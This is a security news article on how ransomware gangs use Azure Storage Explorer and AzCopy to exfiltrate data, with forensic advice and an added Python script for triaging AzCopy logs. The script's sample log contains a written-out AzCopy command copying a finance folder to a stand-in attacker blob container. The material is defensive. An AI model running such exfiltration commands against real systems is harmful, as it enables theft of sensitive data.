Ransomware Gangs Exploit Azure Storage Explorer to Steal Sensitive Data

Recent investigations have revealed that ransomware groups such as BianLian and Rhysida are using Microsoft Azure Storage Explorer to steal sensitive data. The tool was designed for managing Azure storage, but it is now being repurposed for large-scale data transfers out of victim networks and into attacker-controlled cloud storage.

The tactic has become increasingly common in ransomware attacks over the past five years, so incident responders need to understand the forensic evidence that Azure Storage Explorer and AzCopy leave behind on a compromised host.

By recognizing these emerging threats, organizations can improve their incident response capabilities and better protect their critical data from sophisticated exfiltration strategies.

Ransomware attacks have evolved to include data exfiltration as a standard tactic, giving threat actors extra leverage during negotiations. Tools such as MEGAsync and Rclone are commonly used for large-scale exfiltration, and Windows ShellBags, which record the folders a user opened in Explorer, give investigators clues about which directories an actor browsed before copying them.

Threat actors exfiltrate large volumes of data, but they prioritize the most valuable and most tightly protected information, since that is what maximizes pressure on the victim.

Microsoft Azure Storage Explorer

Azure Storage Explorer, a graphical tool for managing Azure storage resources, has been used by ransomware groups like BianLian and Rhysida for data exfiltration. 

The tool relies on AzCopy, Microsoft's command-line utility, to transfer files to Azure Blob Storage. Threat actors often install Azure Storage Explorer on compromised systems and upgrade the .NET runtime so that it will run.

The tool's default installation locations are %USERPROFILE%\AppData\Local\Programs\Microsoft Azure Storage Explorer (per-user install) and C:\Program Files\Microsoft Azure Storage Explorer (system-wide install); either directory appearing on a host where nobody administers Azure storage is worth a closer look.

BianLian has been observed using Azure Storage Explorer to upload large volumes of files to blob containers. The attraction is that blob storage scales to any amount of data and that outbound HTTPS connections to Microsoft Azure endpoints are less likely to be blocked or flagged than connections to unfamiliar hosts.

Azure Blob

Azure Blob Storage organizes data in a three-level hierarchy. A storage account is the top-level namespace for the data and appears as the hostname of every blob URL (account-name.blob.core.windows.net). Within a storage account, containers are created to logically group related blobs.

Blobs are the individual data objects stored within containers. For an investigator, the account name and container name in a destination URL are the most useful identifiers, because they point at the attacker-controlled storage that received the data.

The default INFO logging level in Azure Storage Explorer and AzCopy is a valuable asset for incident responders: the logs record each file transfer, including successful uploads, downloads, and copies, with timestamps.

By analyzing these logs, investigators can identify data exfiltration, such as unauthorized file uploads, and reconstruct which files left the network. The same logs can also reveal other malicious activity, such as downloads that brought toolkits or malicious programs onto the host.
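The log triage described above, as an added example in Python (this is not the article's, ModePUSH's, or Microsoft's code). The line shapes it parses are an assumption modelled on AzCopy's plain-text job logs (a "Job-Command" header line followed by "INFO: [P#n-T#m] UPLOADSUCCESSFUL: <source>" entries) and must be checked against a real log before the regexes are relied on; the sample log, the account name "attackerstore", the container "loot" and the file names are all constructed. It also applies the storage-account/container/blob hierarchy from the Azure Blob section above to split the destination URL, so the investigator gets the attacker's account name as an indicator rather than a raw SAS URL.

```python
"""Triage AzCopy / Azure Storage Explorer job logs for exfiltration evidence.

Added example. Log line shapes are an ASSUMPTION modelled on AzCopy job logs;
verify against a real log and adjust the regexes (paths may appear quoted or
as file:// URIs in some versions).
"""
import re
from collections import Counter
from pathlib import Path
from urllib.parse import urlparse

# Header line giving the command, source and destination (assumed shape).
JOB_COMMAND_RE = re.compile(r"Job-Command\s+(\w+)\s+(\S+)\s+(\S+)")
# Per-file transfer result lines (assumed shape).
TRANSFER_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) INFO: \[P#\d+-T#\d+\] "
    r"(?P<status>UPLOAD(?:SUCCESSFUL|FAILED)|DOWNLOAD(?:SUCCESSFUL|FAILED)): (?P<path>.+)$"
)


def parse_blob_url(url):
    """Split https://<account>.blob.core.windows.net/<container>/<blob>?<sas>
    into (account, container, blob). The SAS token in the query string is
    dropped. Returns None for anything that is not an Azure blob endpoint."""
    u = urlparse(url)
    host = u.netloc.lower()
    if not host.endswith(".blob.core.windows.net"):
        return None
    account = host.split(".")[0]
    parts = u.path.lstrip("/").split("/", 1)
    container = parts[0] or None
    blob = parts[1] if len(parts) > 1 else ""
    return account, container, blob


def triage_log(text):
    """Summarise one job log: command, source, destination and transfers."""
    summary = {"command": None, "source": None, "destination": None,
               "uploads": [], "downloads": [], "failed": 0, "counts": Counter()}
    for line in text.splitlines():
        m = JOB_COMMAND_RE.search(line)
        if m and summary["command"] is None:
            summary["command"], summary["source"], dest = m.groups()
            summary["destination"] = parse_blob_url(dest)
            continue
        m = TRANSFER_RE.match(line)
        if not m:
            continue
        status = m.group("status")
        summary["counts"][status] += 1
        if status == "UPLOADSUCCESSFUL":
            summary["uploads"].append(m.group("path"))   # data that left the host
        elif status == "DOWNLOADSUCCESSFUL":
            summary["downloads"].append(m.group("path"))  # tooling brought in
        else:
            summary["failed"] += 1
    return summary


def triage_directory(log_dir=None):
    """Triage every *.log under the AzCopy log directory. The default
    %USERPROFILE%\\.azcopy is an assumption about the standalone AzCopy layout;
    pass the directory explicitly when working from a disk image."""
    log_dir = Path(log_dir) if log_dir else Path.home() / ".azcopy"
    if not log_dir.is_dir():
        return {}
    return {p.name: triage_log(p.read_text(errors="replace"))
            for p in sorted(log_dir.glob("*.log"))}


# Constructed sample log shaped like an AzCopy job log (not a real capture).
SAMPLE_LOG = """2024/06/20 14:36:30 AzcopyVersion 10.25.1
2024/06/20 14:36:30 Log-Level INFO
2024/06/20 14:36:30 Job-Command copy C:\\Finance https://attackerstore.blob.core.windows.net/loot?sv=2022-11-02&ss=b&sig=REDACTED --recursive --log-level=INFO
2024/06/20 14:36:37 INFO: [P#0-T#0] UPLOADSUCCESSFUL: C:\\Finance\\payroll_2024.xlsx
2024/06/20 14:36:38 INFO: [P#0-T#1] UPLOADSUCCESSFUL: C:\\Finance\\contracts\\msa_acme.pdf
2024/06/20 14:36:39 INFO: [P#0-T#2] UPLOADFAILED: C:\\Finance\\locked.db
"""

if __name__ == "__main__":
    s = triage_log(SAMPLE_LOG)
    print("destination account/container:", s["destination"][:2])
    print("successful uploads:", len(s["uploads"]), "failed:", s["failed"])
    for p in s["uploads"]:
        print("  ", p)
```

Run it against a copy of the log directory taken from the compromised host rather than the live profile, and treat the account name it extracts as an indicator to search for across proxy and firewall logs, since the same attacker account is often reused against several victims.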

Default setting for Logout on Exit

According to ModePUSH, Azure Storage Explorer does not log out on exit by default, so valid Azure Storage sessions are retained even after the application is closed, which could enable unauthorized access to data by anyone who later uses the host. On a compromised system the retained session is also evidence, and should be captured before the application is reopened or the host is rebuilt.

As ransomware tactics shift towards data exfiltration, incident responders must adapt. ModePUSH's identification of Azure Storage Explorer as a data exfiltration tool emphasizes the need for close scrutiny of compromised systems, including unexpected installations of the tool, AzCopy logs, and retained storage sessions.

By staying updated on emerging threats and using the forensic artifacts these tools leave behind, investigators can improve their ability to detect, investigate, and ultimately protect critical data from these attacks.

Kaaviya
Kaaviya is a Security Editor and reporter with Cyber Press, covering cyber security incidents.